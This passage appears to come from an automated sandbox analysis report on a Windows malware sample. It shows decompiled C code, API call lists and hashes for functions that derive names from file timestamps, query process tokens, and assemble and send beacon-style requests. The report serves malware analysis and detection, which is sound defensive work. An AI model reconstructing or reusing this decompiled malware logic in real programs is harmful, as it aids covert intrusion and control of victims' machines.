                                                  					_t10 = _t25 + 2; // 0x2
                                                  					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                  				}
                                                  				return _v8;
                                                  			}

                                                  APIs
                                                  • lstrlenW.KERNEL32(004F0053,75145520,?,00000008,010A937C,?,00C8747C,004F0053,010A937C,?,?,?,?,?,?,00C86814), ref: 00C87CC8
                                                  • lstrlenW.KERNEL32(00C8747C,?,00C8747C,004F0053,010A937C,?,?,?,?,?,?,00C86814), ref: 00C87CCF
                                                    • Part of subcall function 00C82049: RtlAllocateHeap.NTDLL(00000000,00000000,00C87E50), ref: 00C82055
                                                  • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,00C8747C,004F0053,010A937C,?,?,?,?,?,?,00C86814), ref: 00C87CEF
                                                  • memcpy.NTDLL(751469A0,00C8747C,00000002,00000000,004F0053,751469A0,?,?,00C8747C,004F0053,010A937C), ref: 00C87D02
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: lstrlenmemcpy$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 2411391700-0
                                                  • Opcode ID: f11f268c371622f90b8d6c2830d67cb25210aa85c0282334d9ef30495bcdacf1
                                                  • Instruction ID: 5716b4f9dd1fc50b22b69a48d9bcb95433d038eeb79409aee8b7dbcd502d9279
                                                  • Opcode Fuzzy Hash: f11f268c371622f90b8d6c2830d67cb25210aa85c0282334d9ef30495bcdacf1
                                                  • Instruction Fuzzy Hash: 8DF03C76900118BBCB11EFA8CC85CDF7BACEE083587114062B908D7111E771EA14ABA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • lstrlen.KERNEL32(010A87FA,00000000,00000000,74ECC740,00C8A453,00000000), ref: 00C83CD8
                                                  • lstrlen.KERNEL32(?), ref: 00C83CE0
                                                    • Part of subcall function 00C82049: RtlAllocateHeap.NTDLL(00000000,00000000,00C87E50), ref: 00C82055
                                                  • lstrcpy.KERNEL32(00000000,010A87FA), ref: 00C83CF4
                                                  • lstrcat.KERNEL32(00000000,?), ref: 00C83CFF
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                  • String ID:
                                                  • API String ID: 74227042-0
                                                  • Opcode ID: 79e8090fc0b7ff85b700b753d4d84c0313762b77a763adfc142bf5448e342924
                                                  • Instruction ID: c36620b9ab478f9f2f75681aa1d07aa5a280df927b23ce2b9d61852be5fe6050
                                                  • Opcode Fuzzy Hash: 79e8090fc0b7ff85b700b753d4d84c0313762b77a763adfc142bf5448e342924
                                                  • Instruction Fuzzy Hash: 80E06D33501224A78711ABE5AC88E6FBBADEE89A657044416F600D3120C7348D009BA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Executed Functions

                                                  Control-flow Graph

                                                  C-Code - Quality: 93%
                                                  			E04B312D4(signed char* __eax, intOrPtr* _a4) {
                                                  				signed int _v12;
                                                  				void* _v16;
                                                  				CHAR* _v20;
                                                  				struct _FILETIME _v28;
                                                  				void* _v32;
                                                  				void* _v36;
                                                  				char* _v40;
                                                  				signed int _v44;
                                                  				long _v344;
                                                  				struct _WIN32_FIND_DATAA _v368;
                                                  				signed int _t72;
                                                  				void* _t74;
                                                  				signed int _t76;
                                                  				void* _t78;
                                                  				intOrPtr _t81;
                                                  				CHAR* _t83;
                                                  				void* _t85;
                                                  				signed char _t89;
                                                  				signed char _t91;
                                                  				intOrPtr _t93;
                                                  				void* _t96;
                                                  				long _t99;
                                                  				int _t101;
                                                  				signed int _t109;
                                                  				char* _t111;
                                                  				void* _t113;
                                                  				int _t119;
                                                  				char _t128;
                                                  				void* _t134;
                                                  				signed int _t136;
                                                  				char* _t139;
                                                  				signed int _t140;
                                                  				char* _t141;
                                                  				char* _t146;
                                                  				signed char* _t148;
                                                  				int _t151;
                                                  				void* _t152;
                                                  				void* _t153;
                                                  				void* _t154;
                                                  				void* _t165;
                                                  
                                                  				_v12 = _v12 & 0x00000000;
                                                  				_t148 = __eax;
                                                  				_t72 =  *0x4b3d278; // 0x63699bc3
                                                  				_t74 = RtlAllocateHeap( *0x4b3d238, 0, _t72 ^ 0x63699ac7);
                                                  				_v20 = _t74;
                                                  				if(_t74 == 0) {
                                                  					L36:
                                                  					return _v12;
                                                  				}
                                                  				_t76 =  *0x4b3d278; // 0x63699bc3
                                                  				_t78 = RtlAllocateHeap( *0x4b3d238, 0, _t76 ^ 0x63699bce);
                                                  				_t146 = 0;
                                                  				_v36 = _t78;
                                                  				if(_t78 == 0) {
                                                  					L35:
                                                  					HeapFree( *0x4b3d238, _t146, _v20);
                                                  					goto L36;
                                                  				}
                                                  				_t136 =  *0x4b3d278; // 0x63699bc3
                                                  				memset(_t78, 0, _t136 ^ 0x63699bce);
                                                  				_t81 =  *0x4b3d27c; // 0x1fba5a8
                                                  				_t154 = _t153 + 0xc;
                                                  				_t5 = _t81 + 0x4b3e7f2; // 0x73797325
                                                  				_t83 = E04B395B1(_t5);
                                                  				_v20 = _t83;
                                                  				if(_t83 == 0) {
                                                  					L34:
                                                  					HeapFree( *0x4b3d238, _t146, _v36);
                                                  					goto L35;
                                                  				}
                                                  				_t134 = 0xffffffffffffffff;
                                                  				_v28.dwLowDateTime = 0x63699bce;
                                                  				_v28.dwHighDateTime = 0x63699bce;
                                                  				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                                  				_v32 = _t85;
                                                  				if(_t85 != 0x63699bce) {
                                                  					GetFileTime(_t85,  &_v28, 0, 0);
                                                  					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
                                                  					asm("adc dword [ebp-0x14], 0xc9"); // executed
                                                  					FindCloseChangeNotification(_v32); // executed
                                                  				}
                                                  				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
                                                  				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
                                                  				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
                                                  				 *_t148 = _t91;
                                                  				_v32 = _t91 & 0x000000ff;
                                                  				_t93 =  *0x4b3d27c; // 0x1fba5a8
                                                  				_t16 = _t93 + 0x4b3e813; // 0x642e2a5c
                                                  				_v40 = _t146;
                                                  				_v44 = _t89 & 0x000000ff;
                                                  				__imp__(_v20, _t16);
                                                  				_t96 = FindFirstFileA(_v20,  &_v368); // executed
                                                  				_v16 = _t96;
                                                  				if(_t96 == _t134) {
                                                  					_t146 = 0;
                                                  					goto L34;
                                                  				}
                                                  				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                                  				while(_t99 > 0) {
                                                  					_t101 = FindNextFileA(_v16,  &_v368); // executed
                                                  					if(_t101 == 0) {
                                                  						FindClose(_v16);
                                                  						_v16 = FindFirstFileA(_v20,  &_v368);
                                                  						_v28.dwHighDateTime = _v344;
                                                  						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
                                                  					}
                                                  					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                                  				}
                                                  				_v12 = _v12 & 0x00000000;
                                                  				while(1) {
                                                  					_t109 = _v44;
                                                  					if(_v12 <= _t109) {
                                                  						goto L15;
                                                  					}
                                                  					_t140 = _v12;
                                                  					if(_t140 > _v32) {
                                                  						_t141 = _v36;
                                                  						 *_a4 = _t141;
                                                  						while(1) {
                                                  							_t128 =  *_t141;
                                                  							if(_t128 == 0) {
                                                  								break;
                                                  							}
                                                  							if(_t128 < 0x30) {
                                                  								 *_t141 = _t128 + 0x20;
                                                  							}
                                                  							_t141 = _t141 + 1;
                                                  						}
                                                  						_v12 = 1;
                                                  						FindClose(_v16); // executed
                                                  						_t146 = 0;
                                                  						goto L35;
                                                  					}
                                                  					_t165 = _t140 - _t109;
                                                  					L15:
                                                  					if(_t165 == 0 || _v12 == _v32) {
                                                  						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
                                                  						_t139 = _v40;
                                                  						_t151 = _t111 -  &(_v368.cFileName);
                                                  						_t113 = 0;
                                                  						if(_t139 != 0) {
                                                  							_t48 = _t151 - 4; // -4
                                                  							_t113 = _t48;
                                                  							if(_t113 > _t151) {
                                                  								_t113 = 0;
                                                  							}
                                                  						}
                                                  						if(_t151 > 4) {
                                                  							_t151 = 4;
                                                  						}
                                                  						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
                                                  						_t154 = _t154 + 0xc;
                                                  						_v40 =  &(_v40[_t151]);
                                                  					}
                                                  					do {
                                                  						_t119 = FindNextFileA(_v16,  &_v368); // executed
                                                  						if(_t119 == 0) {
                                                  							FindClose(_v16);
                                                  							_v16 = FindFirstFileA(_v20,  &_v368);
                                                  						}
                                                  					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
                                                  					_v12 = _v12 + 1;
                                                  				}
                                                  			}
                                                  0x04b3147a
                                                  0x04b3147e
                                                  0x04b3147e
                                                  0x04b31484
                                                  0x00000000
                                                  0x00000000
                                                  0x04b31486
                                                  0x04b3148c
                                                  0x04b31533
                                                  0x04b31536
                                                  0x04b31543
                                                  0x04b31543
                                                  0x04b31547
                                                  0x00000000
                                                  0x00000000
                                                  0x04b3153c
                                                  0x04b31540
                                                  0x04b31540
                                                  0x04b31542
                                                  0x04b31542
                                                  0x04b3154c
                                                  0x04b31553
                                                  0x04b31555
                                                  0x00000000
                                                  0x04b31555
                                                  0x04b31492
                                                  0x04b31494
                                                  0x04b31494
                                                  0x04b314a7
                                                  0x04b314ad
                                                  0x04b314b8
                                                  0x04b314ba
                                                  0x04b314be
                                                  0x04b314c0
                                                  0x04b314c0
                                                  0x04b314c5
                                                  0x04b314c7
                                                  0x04b314c7
                                                  0x04b314c5
                                                  0x04b314cc
                                                  0x04b314d0
                                                  0x04b314d0
                                                  0x04b314e0
                                                  0x04b314e5
                                                  0x04b314e8
                                                  0x04b314e8
                                                  0x04b314eb
                                                  0x04b314f5
                                                  0x04b314fd
                                                  0x04b31502
                                                  0x04b31510
                                                  0x04b31510
                                                  0x04b31524
                                                  0x04b31528
                                                  0x04b31528

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 04B312FF
                                                  • RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 04B31321
                                                  • memset.NTDLL ref: 04B3133B
                                                    • Part of subcall function 04B395B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,04B323E9,63699BCE,04B31354,73797325), ref: 04B395C2
                                                    • Part of subcall function 04B395B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04B395DC
                                                  • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 04B31379
                                                  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04B3138D
                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 04B313A4
                                                  • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04B313B0
                                                  • lstrcat.KERNEL32(?,642E2A5C), ref: 04B313F1
                                                  • FindFirstFileA.KERNELBASE(?,?), ref: 04B31407
                                                  • CompareFileTime.KERNEL32(?,?), ref: 04B31425
                                                  • FindNextFileA.KERNELBASE(04B396C1,?), ref: 04B31439
                                                  • FindClose.KERNEL32(04B396C1), ref: 04B31446
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 04B31452
                                                  • CompareFileTime.KERNEL32(?,?), ref: 04B31474
                                                  • StrChrA.SHLWAPI(?,0000002E), ref: 04B314A7
                                                  • memcpy.NTDLL(00000000,?,00000000), ref: 04B314E0
                                                  • FindNextFileA.KERNELBASE(04B396C1,?), ref: 04B314F5
                                                  • FindClose.KERNEL32(04B396C1), ref: 04B31502
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 04B3150E
                                                  • CompareFileTime.KERNEL32(?,?), ref: 04B3151E
                                                  • FindClose.KERNELBASE(04B396C1), ref: 04B31553
                                                  • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 04B31565
                                                  • HeapFree.KERNEL32(00000000,?), ref: 04B31575
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                                  • String ID:
                                                  • API String ID: 2944988578-0
                                                  • Opcode ID: 38e0bbf477ae2a221c9a085c0dffc5490228d4ac274addf3f75173e2da0ee898
                                                  • Instruction ID: 6821e6e4fa31c173d68673657d9a7e322696b7529853cf6d76cc2d487c34e0a2
                                                  • Opcode Fuzzy Hash: 38e0bbf477ae2a221c9a085c0dffc5490228d4ac274addf3f75173e2da0ee898
                                                  • Instruction Fuzzy Hash: 6C8128B2900119AFDF11CFAADC84AEEBBBDEB48302F1145A6E505E7250D734AA448F60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 38%
                                                  			E04B383B7(char _a4, void* _a8) {
                                                  				void* _v8;
                                                  				void* _v12;
                                                  				char _v16;
                                                  				void* _v20;
                                                  				char _v24;
                                                  				char _v28;
                                                  				char _v32;
                                                  				char _v36;
                                                  				char _v40;
                                                  				void* _v44;
                                                  				void** _t33;
                                                  				void* _t40;
                                                  				void* _t43;
                                                  				void** _t44;
                                                  				intOrPtr* _t47;
                                                  				char _t48;
                                                  
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				_v20 = _a4;
                                                  				_t48 = 0;
                                                  				_v16 = 0;
                                                  				_a4 = 0;
                                                  				_v44 = 0x18;
                                                  				_v40 = 0;
                                                  				_v32 = 0;
                                                  				_v36 = 0;
                                                  				_v28 = 0;
                                                  				_v24 = 0;
                                                  				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                  					_t33 =  &_v8;
                                                  					__imp__(_v12, 8, _t33);
                                                  					if(_t33 >= 0) {
                                                  						_t47 = __imp__;
                                                  						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                  						_t44 = E04B32049(_a4);
                                                  						if(_t44 != 0) {
                                                  							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                  							if(_t40 >= 0) {
                                                  								memcpy(_a8,  *_t44, 0x1c);
                                                  								_t48 = 1;
                                                  							}
                                                  							E04B39039(_t44);
                                                  						}
                                                  						NtClose(_v8); // executed
                                                  					}
                                                  					NtClose(_v12);
                                                  				}
                                                  				return _t48;
                                                  			}

                                                  Instruction addresses (disassembly text not captured in the extracted listing):
                                                  0x04b383c4 0x04b383c5 0x04b383c6 0x04b383c7 0x04b383c8 0x04b383cc 0x04b383d3 0x04b383e2
                                                  0x04b383e5 0x04b383e8 0x04b383ef 0x04b383f2 0x04b383f5 0x04b383f8 0x04b383fb 0x04b38406
                                                  0x04b38408 0x04b38411 0x04b38419 0x04b3841b 0x04b3842d 0x04b38437 0x04b3843b 0x04b3844a
                                                  0x04b3844e 0x04b38457 0x04b3845f 0x04b3845f 0x04b38461 0x04b38461 0x04b38469 0x04b3846f
                                                  0x04b38473 0x04b38473 0x04b3847e

                                                  APIs
                                                  • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04B383FE
                                                  • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04B38411
                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04B3842D
                                                    • Part of subcall function 04B32049: RtlAllocateHeap.NTDLL(00000000,00000000,04B37E50), ref: 04B32055
                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04B3844A
                                                  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 04B38457
                                                  • NtClose.NTDLL(?), ref: 04B38469
                                                  • NtClose.NTDLL(00000000), ref: 04B38473
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                  • String ID:
                                                  • API String ID: 2575439697-0
                                                  • Opcode ID: 78090a27904e85b0902e6e4d2eb6af77471f46e10dae65ad7b64590d7bfb7f53
                                                  • Instruction ID: 10f9044af3db6665a4f6cb26300f73fc68bfcf113f42345dfe411f5fdd0e589d
                                                  • Opcode Fuzzy Hash: 78090a27904e85b0902e6e4d2eb6af77471f46e10dae65ad7b64590d7bfb7f53
                                                  • Instruction Fuzzy Hash: CE21E9B6900128BBDB11AF96CC45ADEBFBDEF08751F104066F604B6110D7759A549BA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 74%
                                                  			E04B38B94(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                                  				void* _v8;
                                                  				signed int _v12;
                                                  				void* _v16;
                                                  				void* _v20;
                                                  				void* _v24;
                                                  				void* _v28;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				long _t59;
                                                  				intOrPtr _t60;
                                                  				intOrPtr _t61;
                                                  				intOrPtr _t62;
                                                  				intOrPtr _t63;
                                                  				intOrPtr _t64;
                                                  				void* _t67;
                                                  				intOrPtr _t68;
                                                  				int _t71;
                                                  				void* _t72;
                                                  				void* _t73;
                                                  				void* _t75;
                                                  				void* _t78;
                                                  				intOrPtr _t82;
                                                  				intOrPtr _t86;
                                                  				intOrPtr* _t88;
                                                  				void* _t94;
                                                  				intOrPtr _t101;
                                                  				signed int _t105;
                                                  				char** _t107;
                                                  				int _t110;
                                                  				signed int _t112;
                                                  				intOrPtr* _t113;
                                                  				intOrPtr* _t115;
                                                  				intOrPtr* _t117;
                                                  				intOrPtr* _t119;
                                                  				intOrPtr _t122;
                                                  				intOrPtr _t127;
                                                  				int _t131;
                                                  				CHAR* _t133;
                                                  				intOrPtr _t134;
                                                  				void* _t135;
                                                  				void* _t144;
                                                  				int _t145;
                                                  				void* _t146;
                                                  				intOrPtr _t147;
                                                  				void* _t149;
                                                  				long _t153;
                                                  				intOrPtr* _t154;
                                                  				intOrPtr* _t155;
                                                  				intOrPtr* _t158;
                                                  				void* _t159;
                                                  				void* _t161;
                                                  
                                                  				_t144 = __edx;
                                                  				_t135 = __ecx;
                                                  				_t59 = __eax;
                                                  				_v12 = 8;
                                                  				if(__eax == 0) {
                                                  					_t59 = GetTickCount();
                                                  				}
                                                  				_t60 =  *0x4b3d018; // 0xf56cfa1f
                                                  				asm("bswap eax");
                                                  				_t61 =  *0x4b3d014; // 0x3a87c8cd
                                                  				_t133 = _a16;
                                                  				asm("bswap eax");
                                                  				_t62 =  *0x4b3d010; // 0xd8d2f808
                                                  				asm("bswap eax");
                                                  				_t63 =  *0x4b3d00c; // 0x8f8f86c2
                                                  				asm("bswap eax");
                                                  				_t64 =  *0x4b3d27c; // 0x1fba5a8
                                                  				_t3 = _t64 + 0x4b3e633; // 0x74666f73
                                                  				_t145 = wsprintfA(_t133, _t3, 3, 0x3d14b, _t63, _t62, _t61, _t60,  *0x4b3d02c,  *0x4b3d004, _t59);
                                                  				_t67 = E04B31C1A();
                                                  				_t68 =  *0x4b3d27c; // 0x1fba5a8
                                                  				_t4 = _t68 + 0x4b3e673; // 0x74707526
                                                  				_t71 = wsprintfA(_t145 + _t133, _t4, _t67);
                                                  				_t161 = _t159 + 0x38;
                                                  				_t146 = _t145 + _t71; // executed
                                                  				_t72 = E04B354BC(_t135); // executed
                                                  				_t134 = __imp__;
                                                  				_v8 = _t72;
                                                  				if(_t72 != 0) {
                                                  					_t127 =  *0x4b3d27c; // 0x1fba5a8
                                                  					_t7 = _t127 + 0x4b3e8eb; // 0x736e6426
                                                  					_t131 = wsprintfA(_a16 + _t146, _t7, _t72);
                                                  					_t161 = _t161 + 0xc;
                                                  					_t146 = _t146 + _t131;
                                                  					HeapFree( *0x4b3d238, 0, _v8);
                                                  				}
                                                  				_t73 = E04B37649();
                                                  				_v8 = _t73;
                                                  				if(_t73 != 0) {
                                                  					_t122 =  *0x4b3d27c; // 0x1fba5a8
                                                  					_t11 = _t122 + 0x4b3e8f3; // 0x6f687726
                                                  					wsprintfA(_t146 + _a16, _t11, _t73);
                                                  					_t161 = _t161 + 0xc;
                                                  					HeapFree( *0x4b3d238, 0, _v8);
                                                  				}
                                                  				_t147 =  *0x4b3d32c; // 0x6af95b0
                                                  				_t75 = E04B39395(0x4b3d00a, _t147 + 4);
                                                  				_t153 = 0;
                                                  				_v20 = _t75;
                                                  				if(_t75 == 0) {
                                                  					L26:
                                                  					HeapFree( *0x4b3d238, _t153, _a16);
                                                  					return _v12;
                                                  				} else {
                                                  					_t78 = RtlAllocateHeap( *0x4b3d238, 0, 0x800);
                                                  					_v8 = _t78;
                                                  					if(_t78 == 0) {
                                                  						L25:
                                                  						HeapFree( *0x4b3d238, _t153, _v20);
                                                  						goto L26;
                                                  					}
                                                  					E04B37A80(GetTickCount());
                                                  					_t82 =  *0x4b3d32c; // 0x6af95b0
                                                  					__imp__(_t82 + 0x40);
                                                  					asm("lock xadd [eax], ecx");
                                                  					_t86 =  *0x4b3d32c; // 0x6af95b0
                                                  					__imp__(_t86 + 0x40);
                                                  					_t88 =  *0x4b3d32c; // 0x6af95b0
                                                  					_t149 = E04B38307(1, _t144, _a16,  *_t88);
                                                  					_v28 = _t149;
                                                  					asm("lock xadd [eax], ecx");
                                                  					if(_t149 == 0) {
                                                  						L24:
                                                  						HeapFree( *0x4b3d238, _t153, _v8);
                                                  						goto L25;
                                                  					}
                                                  					StrTrimA(_t149, 0x4b3c2ac);
                                                  					_push(_t149);
                                                  					_t94 = E04B33CC8();
                                                  					_v16 = _t94;
                                                  					if(_t94 == 0) {
                                                  						L23:
                                                  						HeapFree( *0x4b3d238, _t153, _t149);
                                                  						goto L24;
                                                  					}
                                                  					_t154 = __imp__;
                                                  					 *_t154(_t149, _a4);
                                                  					 *_t154(_v8, _v20);
                                                   					_t155 = __imp__; // import pointer the decompiler left unresolved (__imp__)
                                                   					 *_t155(_v8, _v16);
                                                   					 *_t155(_v8, _t149);
                                                   					_t101 = E04B3809F(0, _v8); // ANSI-to-wide copy of _v8 (subcall uses lstrlen, mbstowcs, memset; see API list)
                                                   					_a4 = _t101;
                                                   					if(_t101 == 0) {
                                                   						_v12 = 8; // 8 = ERROR_NOT_ENOUGH_MEMORY
                                                   						L21:
                                                   						E04B3A1B0();
                                                   						L22:
                                                   						HeapFree( *0x4b3d238, 0, _v16); // *0x4b3d238 holds the module's heap handle
                                                   						_t153 = 0;
                                                   						goto L23;
                                                   					}
                                                   					_t105 = E04B343DF(_t134, 0xffffffffffffffff, _t149,  &_v24); // executed; on success _v24 points to a holder of three COM interface pointers (released below)
                                                   					_v12 = _t105;
                                                   					if(_t105 == 0) {
                                                   						_t158 = _v24;
                                                   						_t112 = E04B3163F(_t158, _a4, _a8, _a12); // executed; subcall wraps the wide arguments as BSTRs (SysAllocString); judging from the wcstombs call below, *_a8 receives a wide output buffer and *_a12 its byte length
                                                   						_v12 = _t112;
                                                   						_t113 =  *((intOrPtr*)(_t158 + 8));
                                                   						 *((intOrPtr*)( *_t113 + 0x80))(_t113); // vtable slot 32 of the object at +8 (interface not identifiable from this listing)
                                                   						_t115 =  *((intOrPtr*)(_t158 + 8));
                                                   						 *((intOrPtr*)( *_t115 + 8))(_t115); // vtable slot 2 = IUnknown::Release
                                                   						_t117 =  *((intOrPtr*)(_t158 + 4));
                                                   						 *((intOrPtr*)( *_t117 + 8))(_t117); // Release
                                                   						_t119 =  *_t158;
                                                   						 *((intOrPtr*)( *_t119 + 8))(_t119); // Release
                                                   						E04B39039(_t158); // HeapFree wrapper (subcall at 04B39045)
                                                   					}
                                                   					if(_v12 != 0x10d2) { // 0x10d2 = 4306 = ERROR_EMPTY (winerror.h): an empty result is not treated as a failure
                                                   						L16:
                                                   						if(_v12 == 0) {
                                                   							_t107 = _a8;
                                                   							if(_t107 != 0) {
                                                   								_t150 =  *_t107;
                                                   								_t156 =  *_a12;
                                                   								wcstombs( *_t107,  *_t107,  *_a12); // wide-to-ANSI conversion of the returned buffer, in place
                                                   								_t110 = E04B385DB(_t150, _t150, _t156 >> 1); // the byte length halves once the string is narrow
                                                   								_t149 = _v28;
                                                   								 *_a12 = _t110;
                                                   							}
                                                   						}
                                                   						goto L19;
                                                   					} else {
                                                   						if(_a8 != 0) {
                                                   							L19:
                                                   							E04B39039(_a4); // free the wide copy made above
                                                   							if(_v12 == 0 || _v12 == 0x10d2) {
                                                   								goto L22;
                                                   							} else {
                                                   								goto L21;
                                                   							}
                                                   						}
                                                   						_v12 = _v12 & 0x00000000; // ERROR_EMPTY with no output buffer requested: report success
                                                   						goto L16;
                                                   					}
                                                   				}
                                                   			}
                                                   (Instruction addresses 0x04b38b94 to 0x04b38e79 for the listing above, one per decompiled statement; the side-by-side pairing with the C lines was lost when the page was extracted.)

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 04B38BA8
                                                  • wsprintfA.USER32 ref: 04B38BF8
                                                  • wsprintfA.USER32 ref: 04B38C15
                                                  • wsprintfA.USER32 ref: 04B38C41
                                                  • HeapFree.KERNEL32(00000000,?), ref: 04B38C53
                                                  • wsprintfA.USER32 ref: 04B38C74
                                                  • HeapFree.KERNEL32(00000000,?), ref: 04B38C84
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04B38CB2
                                                  • GetTickCount.KERNEL32 ref: 04B38CC3
                                                  • RtlEnterCriticalSection.NTDLL(06AF9570), ref: 04B38CD7
                                                  • RtlLeaveCriticalSection.NTDLL(06AF9570), ref: 04B38CF5
                                                    • Part of subcall function 04B38307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04B3A428,?,06AF95B0), ref: 04B38332
                                                    • Part of subcall function 04B38307: lstrlen.KERNEL32(?,?,?,04B3A428,?,06AF95B0), ref: 04B3833A
                                                    • Part of subcall function 04B38307: strcpy.NTDLL ref: 04B38351
                                                    • Part of subcall function 04B38307: lstrcat.KERNEL32(00000000,?), ref: 04B3835C
                                                    • Part of subcall function 04B38307: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04B3A428,?,06AF95B0), ref: 04B38379
                                                  • StrTrimA.SHLWAPI(00000000,04B3C2AC,?,06AF95B0), ref: 04B38D2C
                                                    • Part of subcall function 04B33CC8: lstrlen.KERNEL32(06AF87FA,00000000,00000000,74ECC740,04B3A453,00000000), ref: 04B33CD8
                                                    • Part of subcall function 04B33CC8: lstrlen.KERNEL32(?), ref: 04B33CE0
                                                    • Part of subcall function 04B33CC8: lstrcpy.KERNEL32(00000000,06AF87FA), ref: 04B33CF4
                                                    • Part of subcall function 04B33CC8: lstrcat.KERNEL32(00000000,?), ref: 04B33CFF
                                                  • lstrcpy.KERNEL32(00000000,?), ref: 04B38D4D
                                                  • lstrcpy.KERNEL32(?,?), ref: 04B38D55
                                                  • lstrcat.KERNEL32(?,?), ref: 04B38D63
                                                  • lstrcat.KERNEL32(?,00000000), ref: 04B38D69
                                                    • Part of subcall function 04B3809F: lstrlen.KERNEL32(?,00000000,04B3D330,00000001,04B32200,04B3D00C,04B3D00C,00000000,00000005,00000000,00000000,?,?,?,04B396C1,04B323E9), ref: 04B380A8
                                                    • Part of subcall function 04B3809F: mbstowcs.NTDLL ref: 04B380CF
                                                    • Part of subcall function 04B3809F: memset.NTDLL ref: 04B380E1
